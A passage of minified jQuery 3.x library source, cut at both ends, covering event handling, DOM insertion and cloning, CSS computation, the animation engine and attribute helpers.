handler: n, guid: n.guid, selector: i, needsContext: i && b.expr.match.needsContext.test(i), namespace: h.join(".") }, o), (p = u[d]) || ((p = u[d] = []).delegateCount = 0, f.setup && !1 !== f.setup.call(e, r, h, a) || e.addEventListener && e.addEventListener(d, a)), f.add && (f.add.call(e, c), c.handler.guid || (c.handler.guid = n.guid)), i ? p.splice(p.delegateCount++, 0, c) : p.push(c), b.event.global[d] = !0) }, remove: function (e, t, n, r, i) { var o, a, s, u, l, c, f, p, d, h, g, v = Y.hasData(e) && Y.get(e); if (v && (u = v.events)) { for (l = (t = (t || "").match(O) || [""]).length; l--;)if (d = g = (s = we.exec(t[l]) || [])[1], h = (s[2] || "").split(".").sort(), d) { for (f = b.event.special[d] || {}, p = u[d = (r ? f.delegateType : f.bindType) || d] || [], s = s[2] && new RegExp("(^|\\.)" + h.join("\\.(?:.*\\.|)") + "(\\.|$)"), a = o = p.length; o--;)c = p[o], !i && g !== c.origType || n && n.guid !== c.guid || s && !s.test(c.namespace) || r && r !== c.selector && ("**" !== r || !c.selector) || (p.splice(o, 1), c.selector && p.delegateCount--, f.remove && f.remove.call(e, c)); a && !p.length && (f.teardown && !1 !== f.teardown.call(e, h, v.handle) || b.removeEvent(e, d, v.handle), delete u[d]) } else for (d in u) b.event.remove(e, d + t[l], n, r, !0); b.isEmptyObject(u) && Y.remove(e, "handle events") } }, dispatch: function (e) { var t, n, r, i, o, a, s = new Array(arguments.length), u = b.event.fix(e), l = (Y.get(this, "events") || Object.create(null))[u.type] || [], c = b.event.special[u.type] || {}; for (s[0] = u, t = 1; t < arguments.length; t++)s[t] = arguments[t]; if (u.delegateTarget = this, !c.preDispatch || !1 !== c.preDispatch.call(this, u)) { for (a = b.event.handlers.call(this, u, l), t = 0; (i = a[t++]) && !u.isPropagationStopped();)for (u.currentTarget = i.elem, n = 0; (o = i.handlers[n++]) && !u.isImmediatePropagationStopped();)u.rnamespace && !1 !== o.namespace && !u.rnamespace.test(o.namespace) || (u.handleObj = o, u.data = o.data, void 0 !== (r = ((b.event.special[o.origType] || {}).handle || o.handler).apply(i.elem, s)) && !1 === (u.result = r) && (u.preventDefault(), u.stopPropagation())); return c.postDispatch && c.postDispatch.call(this, u), u.result } }, handlers: function (e, t) { var n, r, i, o, a, s = [], u = t.delegateCount, l = e.target; if (u && l.nodeType && !("click" === e.type && e.button >= 1)) for (; l !== this; l = l.parentNode || this)if (1 === l.nodeType && ("click" !== e.type || !0 !== l.disabled)) { for (o = [], a = {}, n = 0; n < u; n++)void 0 === a[i = (r = t[n]).selector + " "] && (a[i] = r.needsContext ? b(i, this).index(l) > -1 : b.find(i, this, null, [l]).length), a[i] && o.push(r); o.length && s.push({ elem: l, handlers: o }) } return l = this, u < t.length && s.push({ elem: l, handlers: t.slice(u) }), s }, addProp: function (e, t) { Object.defineProperty(b.Event.prototype, e, { enumerable: !0, configurable: !0, get: h(t) ? function () { if (this.originalEvent) return t(this.originalEvent) } : function () { if (this.originalEvent) return this.originalEvent[e] }, set: function (t) { Object.defineProperty(this, e, { enumerable: !0, configurable: !0, writable: !0, value: t }) } }) }, fix: function (e) { return e[b.expando] ? e : new b.Event(e) }, special: { load: { noBubble: !0 }, click: { setup: function (e) { var t = this || e; return de.test(t.type) && t.click && k(t, "input") && ke(t, "click", Te), !1 }, trigger: function (e) { var t = this || e; return de.test(t.type) && t.click && k(t, "input") && ke(t, "click"), !0 }, _default: function (e) { var t = e.target; return de.test(t.type) && t.click && k(t, "input") && Y.get(t, "click") || k(t, "a") } }, beforeunload: { postDispatch: function (e) { void 0 !== e.result && e.originalEvent && (e.originalEvent.returnValue = e.result) } } } }, b.removeEvent = function (e, t, n) { e.removeEventListener && e.removeEventListener(t, n) }, b.Event = function (e, t) { if (!(this instanceof b.Event)) return new b.Event(e, t); e && e.type ? (this.originalEvent = e, this.type = e.type, this.isDefaultPrevented = e.defaultPrevented || void 0 === e.defaultPrevented && !1 === e.returnValue ? Te : Ce, this.target = e.target && 3 === e.target.nodeType ? e.target.parentNode : e.target, this.currentTarget = e.currentTarget, this.relatedTarget = e.relatedTarget) : this.type = e, t && b.extend(this, t), this.timeStamp = e && e.timeStamp || Date.now(), this[b.expando] = !0 }, b.Event.prototype = { constructor: b.Event, isDefaultPrevented: Ce, isPropagationStopped: Ce, isImmediatePropagationStopped: Ce, isSimulated: !1, preventDefault: function () { var e = this.originalEvent; this.isDefaultPrevented = Te, e && !this.isSimulated && e.preventDefault() }, stopPropagation: function () { var e = this.originalEvent; this.isPropagationStopped = Te, e && !this.isSimulated && e.stopPropagation() }, stopImmediatePropagation: function () { var e = this.originalEvent; this.isImmediatePropagationStopped = Te, e && !this.isSimulated && e.stopImmediatePropagation(), this.stopPropagation() } }, b.each({ altKey: !0, bubbles: !0, cancelable: !0, changedTouches: !0, ctrlKey: !0, detail: !0, eventPhase: !0, metaKey: !0, pageX: !0, pageY: !0, shiftKey: !0, view: !0, char: !0, code: !0, charCode: !0, key: !0, keyCode: !0, button: !0, buttons: !0, clientX: !0, clientY: !0, offsetX: !0, offsetY: !0, pointerId: !0, pointerType: !0, screenX: !0, screenY: !0, targetTouches: !0, toElement: !0, touches: !0, which: !0 }, b.event.addProp), b.each({ focus: "focusin", blur: "focusout" }, function (e, t) { b.event.special[e] = { setup: function () { return ke(this, e, Ee), !1 }, trigger: function () { return ke(this, e), !0 }, _default: function () { return !0 }, delegateType: t } }), b.each({ mouseenter: "mouseover", mouseleave: "mouseout", pointerenter: "pointerover", pointerleave: "pointerout" }, function (e, t) { b.event.special[e] = { delegateType: t, bindType: t, handle: function (e) { var n, r = e.relatedTarget, i = e.handleObj; return r && (r === this || b.contains(this, r)) || (e.type = i.origType, n = i.handler.apply(this, arguments), e.type = t), n } } }), b.fn.extend({ on: function (e, t, n, r) { return Se(this, e, t, n, r) }, one: function (e, t, n, r) { return Se(this, e, t, n, r, 1) }, off: function (e, t, n) { var r, i; if (e && e.preventDefault && e.handleObj) return r = e.handleObj, b(e.delegateTarget).off(r.namespace ? r.origType + "." + r.namespace : r.origType, r.selector, r.handler), this; if ("object" == typeof e) { for (i in e) this.off(i, t, e[i]); return this } return !1 !== t && "function" != typeof t || (n = t, t = void 0), !1 === n && (n = Ce), this.each(function () { b.event.remove(this, e, n, t) }) } }); var Ae = /<script|<style|<link/i, Ne = /checked\s*(?:[^=]|=\s*.checked.)/i, je = /^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g; function De(e, t) { return k(e, "table") && k(11 !== t.nodeType ? t : t.firstChild, "tr") && b(e).children("tbody")[0] || e } function qe(e) { return e.type = (null !== e.getAttribute("type")) + "/" + e.type, e } function Le(e) { return "true/" === (e.type || "").slice(0, 5) ? e.type = e.type.slice(5) : e.removeAttribute("type"), e } function He(e, t) { var n, r, i, o, a, s; if (1 === t.nodeType) { if (Y.hasData(e) && (s = Y.get(e).events)) for (i in Y.remove(t, "handle events"), s) for (n = 0, r = s[i].length; n < r; n++)b.event.add(t, i, s[i][n]); Q.hasData(e) && (o = Q.access(e), a = b.extend({}, o), Q.set(t, a)) } } function Oe(e, t, n, r) { t = o(t); var i, a, s, u, l, c, f = 0, p = e.length, g = p - 1, v = t[0], y = h(v); if (y || p > 1 && "string" == typeof v && !d.checkClone && Ne.test(v)) return e.each(function (i) { var o = e.eq(i); y && (t[0] = v.call(this, i, o.html())), Oe(o, t, n, r) }); if (p && (a = (i = be(t, e[0].ownerDocument, !1, e, r)).firstChild, 1 === i.childNodes.length && (i = a), a || r)) { for (u = (s = b.map(ye(i, "script"), qe)).length; f < p; f++)l = i, f !== g && (l = b.clone(l, !0, !0), u && b.merge(s, ye(l, "script"))), n.call(e[f], l, f); if (u) for (c = s[s.length - 1].ownerDocument, b.map(s, Le), f = 0; f < u; f++)l = s[f], ge.test(l.type || "") && !Y.access(l, "globalEval") && b.contains(c, l) && (l.src && "module" !== (l.type || "").toLowerCase() ? b._evalUrl && !l.noModule && b._evalUrl(l.src, { nonce: l.nonce || l.getAttribute("nonce") }, c) : m(l.textContent.replace(je, ""), l, c)) } return e } function Pe(e, t, n) { for (var r, i = t ? b.filter(t, e) : e, o = 0; null != (r = i[o]); o++)n || 1 !== r.nodeType || b.cleanData(ye(r)), r.parentNode && (n && ie(r) && me(ye(r, "script")), r.parentNode.removeChild(r)); return e } b.extend({ htmlPrefilter: function (e) { return e }, clone: function (e, t, n) { var r, i, o, a, s, u, l, c = e.cloneNode(!0), f = ie(e); if (!(d.noCloneChecked || 1 !== e.nodeType && 11 !== e.nodeType || b.isXMLDoc(e))) for (a = ye(c), r = 0, i = (o = ye(e)).length; r < i; r++)s = o[r], u = a[r], l = void 0, "input" === (l = u.nodeName.toLowerCase()) && de.test(s.type) ? u.checked = s.checked : "input" !== l && "textarea" !== l || (u.defaultValue = s.defaultValue); if (t) if (n) for (o = o || ye(e), a = a || ye(c), r = 0, i = o.length; r < i; r++)He(o[r], a[r]); else He(e, c); return (a = ye(c, "script")).length > 0 && me(a, !f && ye(e, "script")), c }, cleanData: function (e) { for (var t, n, r, i = b.event.special, o = 0; void 0 !== (n = e[o]); o++)if (V(n)) { if (t = n[Y.expando]) { if (t.events) for (r in t.events) i[r] ? b.event.remove(n, r) : b.removeEvent(n, r, t.handle); n[Y.expando] = void 0 } n[Q.expando] && (n[Q.expando] = void 0) } } }), b.fn.extend({ detach: function (e) { return Pe(this, e, !0) }, remove: function (e) { return Pe(this, e) }, text: function (e) { return B(this, function (e) { return void 0 === e ? b.text(this) : this.empty().each(function () { 1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType || (this.textContent = e) }) }, null, e, arguments.length) }, append: function () { return Oe(this, arguments, function (e) { 1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType || De(this, e).appendChild(e) }) }, prepend: function () { return Oe(this, arguments, function (e) { if (1 === this.nodeType || 11 === this.nodeType || 9 === this.nodeType) { var t = De(this, e); t.insertBefore(e, t.firstChild) } }) }, before: function () { return Oe(this, arguments, function (e) { this.parentNode && this.parentNode.insertBefore(e, this) }) }, after: function () { return Oe(this, arguments, function (e) { this.parentNode && this.parentNode.insertBefore(e, this.nextSibling) }) }, empty: function () { for (var e, t = 0; null != (e = this[t]); t++)1 === e.nodeType && (b.cleanData(ye(e, !1)), e.textContent = ""); return this }, clone: function (e, t) { return e = null != e && e, t = null == t ? e : t, this.map(function () { return b.clone(this, e, t) }) }, html: function (e) { return B(this, function (e) { var t = this[0] || {}, n = 0, r = this.length; if (void 0 === e && 1 === t.nodeType) return t.innerHTML; if ("string" == typeof e && !Ae.test(e) && !ve[(he.exec(e) || ["", ""])[1].toLowerCase()]) { e = b.htmlPrefilter(e); try { for (; n < r; n++)1 === (t = this[n] || {}).nodeType && (b.cleanData(ye(t, !1)), t.innerHTML = e); t = 0 } catch (e) { } } t && this.empty().append(e) }, null, e, arguments.length) }, replaceWith: function () { var e = []; return Oe(this, arguments, function (t) { var n = this.parentNode; b.inArray(this, e) < 0 && (b.cleanData(ye(this)), n && n.replaceChild(t, this)) }, e) } }), b.each({ appendTo: "append", prependTo: "prepend", insertBefore: "before", insertAfter: "after", replaceAll: "replaceWith" }, function (e, t) { b.fn[e] = function (e) { for (var n, r = [], i = b(e), o = i.length - 1, s = 0; s <= o; s++)n = s === o ? this : this.clone(!0), b(i[s])[t](n), a.apply(r, n.get()); return this.pushStack(r) } }); var Re = new RegExp("^(" + ee + ")(?!px)[a-z%]+$", "i"), Me = function (t) { var n = t.ownerDocument.defaultView; return n && n.opener || (n = e), n.getComputedStyle(t) }, Ie = function (e, t, n) { var r, i, o = {}; for (i in t) o[i] = e.style[i], e.style[i] = t[i]; for (i in r = n.call(e), t) e.style[i] = o[i]; return r }, We = new RegExp(ne.join("|"), "i"); function Fe(e, t, n) { var r, i, o, a, s = e.style; return (n = n || Me(e)) && ("" !== (a = n.getPropertyValue(t) || n[t]) || ie(e) || (a = b.style(e, t)), !d.pixelBoxStyles() && Re.test(a) && We.test(t) && (r = s.width, i = s.minWidth, o = s.maxWidth, s.minWidth = s.maxWidth = s.width = a, a = n.width, s.width = r, s.minWidth = i, s.maxWidth = o)), void 0 !== a ? a + "" : a } function $e(e, t) { return { get: function () { if (!e()) return (this.get = t).apply(this, arguments); delete this.get } } } !function () { function t() { if (c) { l.style.cssText = "position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0", c.style.cssText = "position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%", re.appendChild(l).appendChild(c); var t = e.getComputedStyle(c); r = "1%" !== t.top, u = 12 === n(t.marginLeft), c.style.right = "60%", a = 36 === n(t.right), i = 36 === n(t.width), c.style.position = "absolute", o = 12 === n(c.offsetWidth / 3), re.removeChild(l), c = null } } function n(e) { return Math.round(parseFloat(e)) } var r, i, o, a, s, u, l = v.createElement("div"), c = v.createElement("div"); c.style && (c.style.backgroundClip = "content-box", c.cloneNode(!0).style.backgroundClip = "", d.clearCloneStyle = "content-box" === c.style.backgroundClip, b.extend(d, { boxSizingReliable: function () { return t(), i }, pixelBoxStyles: function () { return t(), a }, pixelPosition: function () { return t(), r }, reliableMarginLeft: function () { return t(), u }, scrollboxSize: function () { return t(), o }, reliableTrDimensions: function () { var t, n, r, i; return null == s && (t = v.createElement("table"), n = v.createElement("tr"), r = v.createElement("div"), t.style.cssText = "position:absolute;left:-11111px;border-collapse:separate", n.style.cssText = "border:1px solid", n.style.height = "1px", r.style.height = "9px", r.style.display = "block", re.appendChild(t).appendChild(n).appendChild(r), i = e.getComputedStyle(n), s = parseInt(i.height, 10) + parseInt(i.borderTopWidth, 10) + parseInt(i.borderBottomWidth, 10) === n.offsetHeight, re.removeChild(t)), s } })) }(); var Be = ["Webkit", "Moz", "ms"], _e = v.createElement("div").style, ze = {}; function Ue(e) { var t = b.cssProps[e] || ze[e]; return t || (e in _e ? e : ze[e] = function (e) { for (var t = e[0].toUpperCase() + e.slice(1), n = Be.length; n--;)if ((e = Be[n] + t) in _e) return e }(e) || e) } var Xe = /^(none|table(?!-c[ea]).+)/, Ve = /^--/, Ge = { position: "absolute", visibility: "hidden", display: "block" }, Ye = { letterSpacing: "0", fontWeight: "400" }; function Qe(e, t, n) { var r = te.exec(t); return r ? Math.max(0, r[2] - (n || 0)) + (r[3] || "px") : t } function Je(e, t, n, r, i, o) { var a = "width" === t ? 1 : 0, s = 0, u = 0; if (n === (r ? "border" : "content")) return 0; for (; a < 4; a += 2)"margin" === n && (u += b.css(e, n + ne[a], !0, i)), r ? ("content" === n && (u -= b.css(e, "padding" + ne[a], !0, i)), "margin" !== n && (u -= b.css(e, "border" + ne[a] + "Width", !0, i))) : (u += b.css(e, "padding" + ne[a], !0, i), "padding" !== n ? u += b.css(e, "border" + ne[a] + "Width", !0, i) : s += b.css(e, "border" + ne[a] + "Width", !0, i)); return !r && o >= 0 && (u += Math.max(0, Math.ceil(e["offset" + t[0].toUpperCase() + t.slice(1)] - o - u - s - .5)) || 0), u } function Ke(e, t, n) { var r = Me(e), i = (!d.boxSizingReliable() || n) && "border-box" === b.css(e, "boxSizing", !1, r), o = i, a = Fe(e, t, r), s = "offset" + t[0].toUpperCase() + t.slice(1); if (Re.test(a)) { if (!n) return a; a = "auto" } return (!d.boxSizingReliable() && i || !d.reliableTrDimensions() && k(e, "tr") || "auto" === a || !parseFloat(a) && "inline" === b.css(e, "display", !1, r)) && e.getClientRects().length && (i = "border-box" === b.css(e, "boxSizing", !1, r), (o = s in e) && (a = e[s])), (a = parseFloat(a) || 0) + Je(e, t, n || (i ? "border" : "content"), o, r, a) + "px" } function Ze(e, t, n, r, i) { return new Ze.prototype.init(e, t, n, r, i) } b.extend({ cssHooks: { opacity: { get: function (e, t) { if (t) { var n = Fe(e, "opacity"); return "" === n ? "1" : n } } } }, cssNumber: { animationIterationCount: !0, columnCount: !0, fillOpacity: !0, flexGrow: !0, flexShrink: !0, fontWeight: !0, gridArea: !0, gridColumn: !0, gridColumnEnd: !0, gridColumnStart: !0, gridRow: !0, gridRowEnd: !0, gridRowStart: !0, lineHeight: !0, opacity: !0, order: !0, orphans: !0, widows: !0, zIndex: !0, zoom: !0 }, cssProps: {}, style: function (e, t, n, r) { if (e && 3 !== e.nodeType && 8 !== e.nodeType && e.style) { var i, o, a, s = X(t), u = Ve.test(t), l = e.style; if (u || (t = Ue(s)), a = b.cssHooks[t] || b.cssHooks[s], void 0 === n) return a && "get" in a && void 0 !== (i = a.get(e, !1, r)) ? i : l[t]; "string" === (o = typeof n) && (i = te.exec(n)) && i[1] && (n = se(e, t, i), o = "number"), null != n && n == n && ("number" !== o || u || (n += i && i[3] || (b.cssNumber[s] ? "" : "px")), d.clearCloneStyle || "" !== n || 0 !== t.indexOf("background") || (l[t] = "inherit"), a && "set" in a && void 0 === (n = a.set(e, n, r)) || (u ? l.setProperty(t, n) : l[t] = n)) } }, css: function (e, t, n, r) { var i, o, a, s = X(t); return Ve.test(t) || (t = Ue(s)), (a = b.cssHooks[t] || b.cssHooks[s]) && "get" in a && (i = a.get(e, !0, n)), void 0 === i && (i = Fe(e, t, r)), "normal" === i && t in Ye && (i = Ye[t]), "" === n || n ? (o = parseFloat(i), !0 === n || isFinite(o) ? o || 0 : i) : i } }), b.each(["height", "width"], function (e, t) { b.cssHooks[t] = { get: function (e, n, r) { if (n) return !Xe.test(b.css(e, "display")) || e.getClientRects().length && e.getBoundingClientRect().width ? Ke(e, t, r) : Ie(e, Ge, function () { return Ke(e, t, r) }) }, set: function (e, n, r) { var i, o = Me(e), a = !d.scrollboxSize() && "absolute" === o.position, s = (a || r) && "border-box" === b.css(e, "boxSizing", !1, o), u = r ? Je(e, t, r, s, o) : 0; return s && a && (u -= Math.ceil(e["offset" + t[0].toUpperCase() + t.slice(1)] - parseFloat(o[t]) - Je(e, t, "border", !1, o) - .5)), u && (i = te.exec(n)) && "px" !== (i[3] || "px") && (e.style[t] = n, n = b.css(e, t)), Qe(0, n, u) } } }), b.cssHooks.marginLeft = $e(d.reliableMarginLeft, function (e, t) { if (t) return (parseFloat(Fe(e, "marginLeft")) || e.getBoundingClientRect().left - Ie(e, { marginLeft: 0 }, function () { return e.getBoundingClientRect().left })) + "px" }), b.each({ margin: "", padding: "", border: "Width" }, function (e, t) { b.cssHooks[e + t] = { expand: function (n) { for (var r = 0, i = {}, o = "string" == typeof n ? n.split(" ") : [n]; r < 4; r++)i[e + ne[r] + t] = o[r] || o[r - 2] || o[0]; return i } }, "margin" !== e && (b.cssHooks[e + t].set = Qe) }), b.fn.extend({ css: function (e, t) { return B(this, function (e, t, n) { var r, i, o = {}, a = 0; if (Array.isArray(t)) { for (r = Me(e), i = t.length; a < i; a++)o[t[a]] = b.css(e, t[a], !1, r); return o } return void 0 !== n ? b.style(e, t, n) : b.css(e, t) }, e, t, arguments.length > 1) } }), b.Tween = Ze, Ze.prototype = { constructor: Ze, init: function (e, t, n, r, i, o) { this.elem = e, this.prop = n, this.easing = i || b.easing._default, this.options = t, this.start = this.now = this.cur(), this.end = r, this.unit = o || (b.cssNumber[n] ? "" : "px") }, cur: function () { var e = Ze.propHooks[this.prop]; return e && e.get ? e.get(this) : Ze.propHooks._default.get(this) }, run: function (e) { var t, n = Ze.propHooks[this.prop]; return this.options.duration ? this.pos = t = b.easing[this.easing](e, this.options.duration * e, 0, 1, this.options.duration) : this.pos = t = e, this.now = (this.end - this.start) * t + this.start, this.options.step && this.options.step.call(this.elem, this.now, this), n && n.set ? n.set(this) : Ze.propHooks._default.set(this), this } }, Ze.prototype.init.prototype = Ze.prototype, Ze.propHooks = { _default: { get: function (e) { var t; return 1 !== e.elem.nodeType || null != e.elem[e.prop] && null == e.elem.style[e.prop] ? e.elem[e.prop] : (t = b.css(e.elem, e.prop, "")) && "auto" !== t ? t : 0 }, set: function (e) { b.fx.step[e.prop] ? b.fx.step[e.prop](e) : 1 !== e.elem.nodeType || !b.cssHooks[e.prop] && null == e.elem.style[Ue(e.prop)] ? e.elem[e.prop] = e.now : b.style(e.elem, e.prop, e.now + e.unit) } } }, Ze.propHooks.scrollTop = Ze.propHooks.scrollLeft = { set: function (e) { e.elem.nodeType && e.elem.parentNode && (e.elem[e.prop] = e.now) } }, b.easing = { linear: function (e) { return e }, swing: function (e) { return .5 - Math.cos(e * Math.PI) / 2 }, _default: "swing" }, b.fx = Ze.prototype.init, b.fx.step = {}; var et, tt, nt = /^(?:toggle|show|hide)$/, rt = /queueHooks$/; function it() { tt && (!1 === v.hidden && e.requestAnimationFrame ? e.requestAnimationFrame(it) : e.setTimeout(it, b.fx.interval), b.fx.tick()) } function ot() { return e.setTimeout(function () { et = void 0 }), et = Date.now() } function at(e, t) { var n, r = 0, i = { height: e }; for (t = t ? 1 : 0; r < 4; r += 2 - t)i["margin" + (n = ne[r])] = i["padding" + n] = e; return t && (i.opacity = i.width = e), i } function st(e, t, n) { for (var r, i = (ut.tweeners[t] || []).concat(ut.tweeners["*"]), o = 0, a = i.length; o < a; o++)if (r = i[o].call(n, t, e)) return r } function ut(e, t, n) { var r, i, o = 0, a = ut.prefilters.length, s = b.Deferred().always(function () { delete u.elem }), u = function () { if (i) return !1; for (var t = et || ot(), n = Math.max(0, l.startTime + l.duration - t), r = 1 - (n / l.duration || 0), o = 0, a = l.tweens.length; o < a; o++)l.tweens[o].run(r); return s.notifyWith(e, [l, r, n]), r < 1 && a ? n : (a || s.notifyWith(e, [l, 1, 0]), s.resolveWith(e, [l]), !1) }, l = s.promise({ elem: e, props: b.extend({}, t), opts: b.extend(!0, { specialEasing: {}, easing: b.easing._default }, n), originalProperties: t, originalOptions: n, startTime: et || ot(), duration: n.duration, tweens: [], createTween: function (t, n) { var r = b.Tween(e, l.opts, t, n, l.opts.specialEasing[t] || l.opts.easing); return l.tweens.push(r), r }, stop: function (t) { var n = 0, r = t ? l.tweens.length : 0; if (i) return this; for (i = !0; n < r; n++)l.tweens[n].run(1); return t ? (s.notifyWith(e, [l, 1, 0]), s.resolveWith(e, [l, t])) : s.rejectWith(e, [l, t]), this } }), c = l.props; for (!function (e, t) { var n, r, i, o, a; for (n in e) if (i = t[r = X(n)], o = e[n], Array.isArray(o) && (i = o[1], o = e[n] = o[0]), n !== r && (e[r] = o, delete e[n]), (a = b.cssHooks[r]) && "expand" in a) for (n in o = a.expand(o), delete e[r], o) n in e || (e[n] = o[n], t[n] = i); else t[r] = i }(c, l.opts.specialEasing); o < a; o++)if (r = ut.prefilters[o].call(l, e, c, l.opts)) return h(r.stop) && (b._queueHooks(l.elem, l.opts.queue).stop = r.stop.bind(r)), r; return b.map(c, st, l), h(l.opts.start) && l.opts.start.call(e, l), l.progress(l.opts.progress).done(l.opts.done, l.opts.complete).fail(l.opts.fail).always(l.opts.always), b.fx.timer(b.extend(u, { elem: e, anim: l, queue: l.opts.queue })), l } b.Animation = b.extend(ut, { tweeners: { "*": [function (e, t) { var n = this.createTween(e, t); return se(n.elem, e, te.exec(t), n), n }] }, tweener: function (e, t) { h(e) ? (t = e, e = ["*"]) : e = e.match(O); for (var n, r = 0, i = e.length; r < i; r++)n = e[r], ut.tweeners[n] = ut.tweeners[n] || [], ut.tweeners[n].unshift(t) }, prefilters: [function (e, t, n) { var r, i, o, a, s, u, l, c, f = "width" in t || "height" in t, p = this, d = {}, h = e.style, g = e.nodeType && ae(e), v = Y.get(e, "fxshow"); for (r in n.queue || (null == (a = b._queueHooks(e, "fx")).unqueued && (a.unqueued = 0, s = a.empty.fire, a.empty.fire = function () { a.unqueued || s() }), a.unqueued++, p.always(function () { p.always(function () { a.unqueued--, b.queue(e, "fx").length || a.empty.fire() }) })), t) if (i = t[r], nt.test(i)) { if (delete t[r], o = o || "toggle" === i, i === (g ? "hide" : "show")) { if ("show" !== i || !v || void 0 === v[r]) continue; g = !0 } d[r] = v && v[r] || b.style(e, r) } if ((u = !b.isEmptyObject(t)) || !b.isEmptyObject(d)) for (r in f && 1 === e.nodeType && (n.overflow = [h.overflow, h.overflowX, h.overflowY], null == (l = v && v.display) && (l = Y.get(e, "display")), "none" === (c = b.css(e, "display")) && (l ? c = l : (ce([e], !0), l = e.style.display || l, c = b.css(e, "display"), ce([e]))), ("inline" === c || "inline-block" === c && null != l) && "none" === b.css(e, "float") && (u || (p.done(function () { h.display = l }), null == l && (c = h.display, l = "none" === c ? "" : c)), h.display = "inline-block")), n.overflow && (h.overflow = "hidden", p.always(function () { h.overflow = n.overflow[0], h.overflowX = n.overflow[1], h.overflowY = n.overflow[2] })), u = !1, d) u || (v ? "hidden" in v && (g = v.hidden) : v = Y.access(e, "fxshow", { display: l }), o && (v.hidden = !g), g && ce([e], !0), p.done(function () { for (r in g || ce([e]), Y.remove(e, "fxshow"), d) b.style(e, r, d[r]) })), u = st(g ? v[r] : 0, r, p), r in v || (v[r] = u.start, g && (u.end = u.start, u.start = 0)) }], prefilter: function (e, t) { t ? ut.prefilters.unshift(e) : ut.prefilters.push(e) } }), b.speed = function (e, t, n) { var r = e && "object" == typeof e ? b.extend({}, e) : { complete: n || !n && t || h(e) && e, duration: e, easing: n && t || t && !h(t) && t }; return b.fx.off ? r.duration = 0 : "number" != typeof r.duration && (r.duration in b.fx.speeds ? r.duration = b.fx.speeds[r.duration] : r.duration = b.fx.speeds._default), null != r.queue && !0 !== r.queue || (r.queue = "fx"), r.old = r.complete, r.complete = function () { h(r.old) && r.old.call(this), r.queue && b.dequeue(this, r.queue) }, r }, b.fn.extend({ fadeTo: function (e, t, n, r) { return this.filter(ae).css("opacity", 0).show().end().animate({ opacity: t }, e, n, r) }, animate: function (e, t, n, r) { var i = b.isEmptyObject(e), o = b.speed(t, n, r), a = function () { var t = ut(this, b.extend({}, e), o); (i || Y.get(this, "finish")) && t.stop(!0) }; return a.finish = a, i || !1 === o.queue ? this.each(a) : this.queue(o.queue, a) }, stop: function (e, t, n) { var r = function (e) { var t = e.stop; delete e.stop, t(n) }; return "string" != typeof e && (n = t, t = e, e = void 0), t && this.queue(e || "fx", []), this.each(function () { var t = !0, i = null != e && e + "queueHooks", o = b.timers, a = Y.get(this); if (i) a[i] && a[i].stop && r(a[i]); else for (i in a) a[i] && a[i].stop && rt.test(i) && r(a[i]); for (i = o.length; i--;)o[i].elem !== this || null != e && o[i].queue !== e || (o[i].anim.stop(n), t = !1, o.splice(i, 1)); !t && n || b.dequeue(this, e) }) }, finish: function (e) { return !1 !== e && (e = e || "fx"), this.each(function () { var t, n = Y.get(this), r = n[e + "queue"], i = n[e + "queueHooks"], o = b.timers, a = r ? r.length : 0; for (n.finish = !0, b.queue(this, e, []), i && i.stop && i.stop.call(this, !0), t = o.length; t--;)o[t].elem === this && o[t].queue === e && (o[t].anim.stop(!0), o.splice(t, 1)); for (t = 0; t < a; t++)r[t] && r[t].finish && r[t].finish.call(this); delete n.finish }) } }), b.each(["toggle", "show", "hide"], function (e, t) { var n = b.fn[t]; b.fn[t] = function (e, r, i) { return null == e || "boolean" == typeof e ? n.apply(this, arguments) : this.animate(at(t, !0), e, r, i) } }), b.each({ slideDown: at("show"), slideUp: at("hide"), slideToggle: at("toggle"), fadeIn: { opacity: "show" }, fadeOut: { opacity: "hide" }, fadeToggle: { opacity: "toggle" } }, function (e, t) { b.fn[e] = function (e, n, r) { return this.animate(t, e, n, r) } }), b.timers = [], b.fx.tick = function () { var e, t = 0, n = b.timers; for (et = Date.now(); t < n.length; t++)(e = n[t])() || n[t] !== e || n.splice(t--, 1); n.length || b.fx.stop(), et = void 0 }, b.fx.timer = function (e) { b.timers.push(e), b.fx.start() }, b.fx.interval = 13, b.fx.start = function () { tt || (tt = !0, it()) }, b.fx.stop = function () { tt = null }, b.fx.speeds = { slow: 600, fast: 200, _default: 400 }, b.fn.delay = function (t, n) { return t = b.fx && b.fx.speeds[t] || t, n = n || "fx", this.queue(n, function (n, r) { var i = e.setTimeout(n, t); r.stop = function () { e.clearTimeout(i) } }) }, function () { var e = v.createElement("input"), t = v.createElement("select").appendChild(v.createElement("option")); e.type = "checkbox", d.checkOn = "" !== e.value, d.optSelected = t.selected, (e = v.createElement("input")).value = "t", e.type = "radio", d.radioValue = "t" === e.value }(); var lt, ct = b.expr.attrHandle; b.fn.extend({ attr: function (e, t) { return B(this, b.attr, e, t, arguments.length > 1) }, removeAttr: function (e) { return this.each(function () { b.removeAttr(this, e) }) } }), b.extend({ attr: function (e, t, n) { var r, i, o = e.nodeType; if (3 !== o && 8 !== o && 2 !== o) return void 0 === e.getAttribute ? b.prop(e, t, n) : (1 === o && b.isXMLDoc(e) || (i = b.attrHooks[t.toLowerCase()] || (b.expr.match.bool.test(t) ? lt : void 0)), void 0 !== n ? null === n ? void b.removeAttr(e, t) : i && "set" in i && void 0 !== (r = i.set(e, n, t)) ? r : (e.setAttribute(t, n + ""), n) : i && "get" in i && null !== (r = i.get(e, t)) ? r : null == (r = b.find.attr(e, t)) ? void 0 : r) }, attrHooks: { type: { set: function (e, t) { if (!d.radioValue && "radio" === t && k(e, "input")) { var n = e.value; return e.setAttribute("type", t), n && (e.value = n), t } } } }, removeAttr: function (e, t) { var n, r = 0, i = t && t.match(O); if (i && 1 === e.nodeType) for (; n = i[r++];)e.removeAttribute(n) } }), lt = { set: function (e, t, n) { return !1 === t ? b.removeAttr(e, n) : e.setAttribute(n, n), n } }, b.each(b.expr.match.bool.source.match(/\w+/g), function (e, t) { var n = ct[t] || b.find.attr; ct[t] = function (e, t, r) { var i, o, a = t.toLowerCase(); return r || (o = ct[a], ct[a] = i, i = null != n(e, t, r) ? a : null, ct[a] = o), i } }); var ft = /^(?:input|select|textarea|button)$/i, pt = /^(?:a|area)$/i; function dt(e) { return (e.match(O) || []).join(" ") } function ht(e) { return e.getAttribute && 